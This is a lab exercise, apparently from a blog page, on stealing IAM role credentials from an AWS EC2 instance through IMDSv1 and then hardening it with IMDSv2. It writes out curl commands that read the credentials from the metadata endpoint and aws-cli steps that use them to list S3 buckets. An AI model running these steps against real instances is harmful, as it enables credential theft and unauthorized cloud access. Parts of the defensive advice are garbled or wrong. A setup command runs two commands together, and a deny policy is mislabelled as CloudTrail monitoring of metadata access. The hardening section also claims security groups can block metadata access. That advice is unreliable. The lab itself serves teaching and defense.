Objective:
Understand how attackers can exploit weaknesses in the instance metadata service (IMDS) of cloud environments (e.g., AWS EC2) to retrieve sensitive data such as IAM role credentials. Learn how to secure IMDS by configuring Instance Metadata Service v2 (IMDSv2) and enforcing access control.
Scenario:
An organization deploys an EC2 instance with IMDS improperly configured, allowing unrestricted access to sensitive metadata such as IAM role credentials. An attacker compromises the instance and retrieves the metadata to gain unauthorized access to cloud resources. Your goal is to simulate this attack and demonstrate how to secure IMDS.
Lab Setup:
Prerequisites:
- Access to an AWS account.
- Installed tools:
- aws-cli (Installation Guide).
- curl (pre-installed on most Linux distributions).
Steps to Set Up the Lab:
- Launch an EC2 Instance:
- Navigate to EC2 > Launch Instance.
- Configure the instance:
- AMI: Amazon Linux 2 or Ubuntu.
- Instance Type: t2.micro (free tier eligible).
- IAM Role: Assign an IAM role with permissions to access specific resources (e.g., S3 or DynamoDB).
- Security Group: Allow SSH (port 22) from your IP.
- Launch the instance and note its public IP.
- Enable Metadata Service v1:
- Ensure that IMDSv1 is enabled by default. If not, run the following command after SSHing into the instance:bashCopyEdit
sudo yum update -y aws ec2 modify-instance-metadata-options \ --instance-id <instance-id> \ --http-endpoint enabled \ --http-tokens optional
- Ensure that IMDSv1 is enabled by default. If not, run the following command after SSHing into the instance:bashCopyEdit
- Set Up IAM Role with Broad Permissions:
- Create an IAM role with permissions to list and access resources (e.g., S3 buckets):jsonCopyEdit
{ "Version": "2012-10-17", "Statement": [ { "Effect": "Allow", "Action": "s3:ListAllMyBuckets", "Resource": "*" } ] } - Attach this role to the EC2 instance.
- Create an IAM role with permissions to list and access resources (e.g., S3 buckets):jsonCopyEdit
Exercise: Exploiting IMDS
Objective:
Simulate an attacker exploiting IMDS to retrieve sensitive metadata and IAM role credentials.
- Connect to the Instance:
- SSH into the EC2 instance:bashCopyEdit
ssh -i <key-file>.pem ec2-user@<public-ip>
- SSH into the EC2 instance:bashCopyEdit
- Access Instance Metadata:
- Use
curlto query the IMDS endpoint:bashCopyEditcurl http://169.254.169.254/latest/meta-data/ - Retrieve metadata such as:
- Instance ID:bashCopyEdit
curl http://169.254.169.254/latest/meta-data/instance-id - IAM Role Name:bashCopyEdit
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
- Instance ID:bashCopyEdit
- Use
- Retrieve IAM Role Credentials:
- Use
curlto fetch IAM role credentials:bashCopyEditcurl http://169.254.169.254/latest/meta-data/iam/security-credentials/<role-name> - Note the
AccessKeyId,SecretAccessKey, andToken.
- Use
- Abuse the IAM Role Credentials:
- Configure the
aws-cliwith the retrieved credentials:bashCopyEditaws configure- Enter the
AccessKeyId,SecretAccessKey, andToken.
- Enter the
- Use the credentials to list S3 buckets:bashCopyEdit
aws s3 ls
- Configure the
Tools Required:
- AWS EC2: For deploying the instance.
- curl: For querying the metadata service.
- aws-cli: For using the retrieved IAM role credentials.
Deliverables:
- Exploit Report:
- Evidence of accessing metadata and IAM role credentials via IMDS.
- Screenshots or logs demonstrating unauthorized actions using the retrieved credentials.
- Recommendations for Securing IMDS:
- Steps to configure and enforce IMDSv2, restrict metadata access, and monitor for suspicious activity.
Solution:
- Identified Vulnerabilities:
- IMDSv1 Enabled: IMDSv1 allows unrestricted access to instance metadata without authentication.
- Overly Permissive IAM Role: The assigned IAM role had broad permissions, enabling potential abuse.
- No Metadata Access Restrictions: Metadata was accessible to all processes within the instance.
- Consequences:
- Credential Theft: Attackers can retrieve IAM role credentials and use them to access cloud resources.
- Unauthorized Access: The stolen credentials can be used to list or manipulate cloud resources.
- Data Breach: Sensitive data stored in cloud services (e.g., S3 buckets) could be exposed.
- Prevention Techniques:
- Enforce IMDSv2:
- IMDSv2 requires session tokens, making it more secure against metadata theft.
- Enable IMDSv2:bashCopyEdit
aws ec2 modify-instance-metadata-options \ --instance-id <instance-id> \ --http-tokens required
- Restrict Metadata Access:
- Use firewalls or security group rules to block access to the metadata service from unauthorized sources.
- Limit IAM Role Permissions:
- Apply the principle of least privilege to IAM roles.
- Monitor Metadata Access:
- Use CloudTrail to log and monitor metadata access:jsonCopyEdit
{ "Effect": "Deny", "Action": "sts:AssumeRole", "Resource": "*", "Condition": { "IpAddress": {"aws:SourceIp": "169.254.169.254/32"} } }
- Use CloudTrail to log and monitor metadata access:jsonCopyEdit
- Use Egress Controls:
- Configure instance egress traffic rules to restrict unauthorized access to metadata.
- Enforce IMDSv2:
Conclusion:
This exercise demonstrates how improperly configured instance metadata services can expose sensitive information, such as IAM role credentials. By enforcing IMDSv2, restricting metadata access, and applying the principle of least privilege, organizations can secure their cloud environments against metadata exploitation.
0 Comments